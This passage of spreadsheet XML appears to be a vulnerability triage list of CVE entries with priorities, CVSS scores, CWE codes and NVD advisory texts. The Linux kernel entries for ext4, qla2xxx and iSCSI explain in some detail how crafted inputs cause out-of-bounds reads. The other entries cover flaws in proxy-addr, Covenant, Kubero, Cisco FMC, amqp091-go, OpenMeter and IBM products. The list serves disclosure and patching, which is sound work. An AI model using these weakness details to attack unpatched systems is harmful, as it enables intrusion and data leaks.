buffer, triggering a slab-out-of-bounds read during getdents64():
  BUG: KASAN: slab-out-of-bounds in __ext4_check_dir_entry
  Read of size 2 at addr ffff88800f3dd23c by task exploit/148
   ...
   __ext4_check_dir_entry
   ext4_read_inline_dir
   iterate_dir
The dirent payload lives in a buffer of exactly inline_size bytes:
	dir_buf = kmalloc(inline_size, GFP_NOFS);
but iteration runs in a position space extra_offset bytes larger
(extra_size = extra_offset + inline_size) so the synthetic "." and ".."
land at their block-dir offsets. A dirent is formed at "dir_buf + pos -
extra_offset", yet the ext4_check_dir_entry() length argument uses the
larger extra_size. A position whose dirent header would extend past
extra_size is therefore accepted, and the rescan loop's rec_len probe and
ext4_check_dir_entry() dereference de-&gt;rec_len before the entry is rejected.
Reject a position whose minimum-size dirent header would not fit within
extra_size before forming de, in both the rescan and main loops, and pass
inline_size rather than extra_size to ext4_check_dir_entry() so the length
check matches the physical buffer.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89786</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89846</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Bound rsp_info_len to avoid OOB sense-data read
In qla2x00_status_entry(), the FWI2 status path advances sense_data and
shrinks par_sense_len by rsp_info_len:
	if (IS_FWI2_CAPABLE(ha)) {
		sense_data += rsp_info_len;
		par_sense_len -= rsp_info_len;
	}
rsp_info_len is a 32-bit value taken directly from the target's FCP
response (sf.rsp_data_len), while par_sense_len is the IOCB data area
size (28 bytes for 24xx, 60 bytes for 29xx). A hostile or buggy target
reporting an rsp_info_len larger than par_sense_len makes the unsigned
subtraction underflow to a huge value and advances sense_data out of
bounds.
The underflowed par_sense_len then defeats the cap in
qla2x00_handle_sense():
	if (sense_len &gt; par_sense_len)
		sense_len = par_sense_len;
	memcpy(cp-&gt;sense_buffer, sense_data, sense_len);
so the memcpy reads up to SCSI_SENSE_BUFFERSIZE bytes from the
out-of-bounds sense_data pointer, leaking adjacent response-ring/heap
memory into the command's sense buffer.
Clamp rsp_info_len to par_sense_len before the subtraction so
par_sense_len can never underflow and sense_data stays within the IOCB
data area. The fix sits before the comp_status switch, covering both
qla2x00_handle_sense() call sites.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89846</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90011</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: target: iscsi: Reserve a terminator byte for the login payload
iscsi_target_check_login_request() rejects a login PDU whose
DataSegmentLength exceeds MAX_KEY_VALUE_PAIRS, but the test is '&gt;' and
login-&gt;req_buf is allocated with exactly MAX_KEY_VALUE_PAIRS
bytes. Since iscsit_get_login_rx() receives payload_length + padding
bytes, where
	padding = ((-payload_length) &amp; 3);
any payload_length from 8189 to 8192 fills the whole 8192 byte
buffer. The write stays in bounds, but no byte is left for a NUL
terminator.
The buffer is subsequently consumed as a C string. In the CHAP path
chap_check_algorithm() calls kstrdup(a_str), and extract_param() calls
strstr(in_buf, pattern) followed by strlen_semi(), none of which take a
length. convert_null_to_semi() additionally rewrites every embedded NUL
to ';', so even a payload made of well formed NUL separated key=value
records is left without a terminator. These walk past the end of the
object into adjacent slab memory. It is reachable by an unauthenticated
initiator against a portal configured for CHAP; when authentication is
not required iscsi_login_zero_tsih_s2() rewrites AuthMethod to None and
the CHAP path is never entered.
Allocate one extra byte. kzalloc() zeroes it and nothing ever writes to
it, as every writer copies to offset 0 for at most MAX_KEY_VALUE_PAIRS
bytes, so the buffer is always terminated.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90011</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92395</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-348, CWE-697</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>@fastify/proxy-addr is a Fastify plugin that determines a request's client address behind trusted reverse proxies, and it backs Fastify request.ip and request.ips. In versions 3.0.0 through 5.1.0, a trust subnet written in IPv4-mapped IPv6 notation with an IPv4-sized prefix, such as ::ffff:10.0.0.0/8 instead of the correct ::ffff:10.0.0.0/104, is accepted without error but trusts every IPv4 address on the internet rather than the block it names. Because the socket peer then becomes trusted at hop 0, any unauthenticated client can supply an arbitrary X-Forwarded-For header and control the address the application reads, which defeats IP-based access control, rate limiting, geolocation, and audit logging. The plugin inherited this defect from the upstream proxy-addr module (CVE-2026-90711). The issue is fixed in @fastify/proxy-addr 5.1.1, and users should upgrade to 5.1.1 or later. As a workaround, ensure any IPv4-mapped IPv6 trust subnet uses a prefix length of at least 97, or express the range in plain IPv4 notation.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92395</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92717</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>Covenant through 0.6 registers the CovenantHub SignalR hub without an Authorize attribute, allowing unauthenticated callers to invoke CreateHttpListener and receive a signed JWT token. Attackers can use the obtained token to authenticate against the entire operator API and access grunts, credentials, binaries, events, and the operator roster.</t>
        </is>
      </c>
      <c r="S130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92717</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92720</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr"/>
      <c r="Q131" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>Kubero through 3.1.1 fails to apply authentication guards to the notifications API endpoints, allowing unauthenticated attackers to read webhook secrets and service URLs. Attackers can retrieve stored credentials and register malicious webhooks to intercept pipeline events or suppress alerting by deleting existing configurations.</t>
        </is>
      </c>
      <c r="S131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92720</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76420</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>psirt@cisco.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr"/>
      <c r="Q132" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the internal configuration of the Apache JServ Protocol (AJP)&amp;nbsp;connector for Cisco Secure FMC Software could allow an unauthenticated, remote attacker to impersonate a peer device.
This vulnerability is due to incorrect initialization of encryption parameters for the AJP connector at boot time. An attacker could exploit this vulnerability by sending crafted packets to the AJP connector. A&amp;nbsp;successful exploit could allow the attacker to execute commands as root and&amp;nbsp;gain full control over the FMC REST APIs on the affected device.
Note: This vulnerability can be exploited only if the valid sftunnel connection between Cisco Secure FMC Software and Cisco Secure FTD Software is down.</t>
        </is>
      </c>
      <c r="S132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76420</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73455</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr"/>
      <c r="Q133" s="5" t="inlineStr">
        <is>
          <t>CWE-130</t>
        </is>
      </c>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with Open Shortest Path First version 3 (OSPFv3) configured, a specially crafted packet can cause the OSPFv3 agent to restart unexpectedly.</t>
        </is>
      </c>
      <c r="S133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73455</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77403</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr"/>
      <c r="Q134" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Connection.openTune in connection.go accepts a server-advertised FrameMax below the AMQP frameMinSize value of 4096 bytes because the connection negotiation loop does not enforce the protocol minimum. A malicious or compromised AMQP broker can therefore advertise an extremely small FrameMax, causing later client publications to be fragmented into excessive numbers of frames and write operations. This can consume CPU and stall the client or its host. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77403</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77410</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr"/>
      <c r="Q135" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, Channel.recvContent in channel.go preallocates the message body slice with the uint64 ch.header.Size value supplied by an AMQP content header without capping the allocation to the negotiated Connection.Config.FrameSize value. A malicious or compromised broker can send an extreme declared body size and cause the Go runtime to attempt a correspondingly large allocation before body data is received. The allocation can exhaust memory and terminate the client process. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77410</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77412</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, readField in read.go reads the length of an AMQP byte-array field with type tag x into a signed int32 and passes the value directly to make when allocating the field buffer. A malicious or compromised broker can encode a value such as 0xFFFFFFFF, which becomes -1 and causes a len out of range runtime panic. The panic escapes the network reader goroutine and terminates the client process, including during connection.start server properties or message header table parsing. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77412</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8462</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>02762ae7-200e-4b20-9b2b-a77d5b8fc4cb</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>SQL injection in ClickHouse-backed meter definitions in OpenMeter OpenMeter before v1.0.0-beta.228 on all platforms allows a remote unauthenticated attacker to access or modify metering event data, and potentially cause denial of service, via crafted user-controlled JSONPath values submitted to meters API.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8462</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-46273</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>Bonjour Gateway in Extreme Networks IQ Engine before 10.6r1a, and through 10.6r4 before 10.6r5, has an ah_bgd buffer overflow via ah_event_send.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-46273</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13293</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>IBM MQ 9.1.0.0 through 9.1.0.37 LTS, 9.2.0.0 through 9.2.0.43 LTS, 9.3.0.0 through 9.3.0.41 LTS, 9.3.0.0 through 9.3.5.1 CD, 9.4.0.0 through 9.4.0.25 LTS, 9.4.0.0 through 9.4.5.1 CD, and 10.0.0.0 could allow a remote authenticated attacker to execute arbitrary code on the system due to the deserialization of untrusted data.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13293</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16428</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to execute arbitrary code due to improper configuration of the XSLT transformation engine.</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16428</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16466</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr"/>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 IBM DataStage could allow a remote authenticated attacker to execute arbitrary commands due to os command injection.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
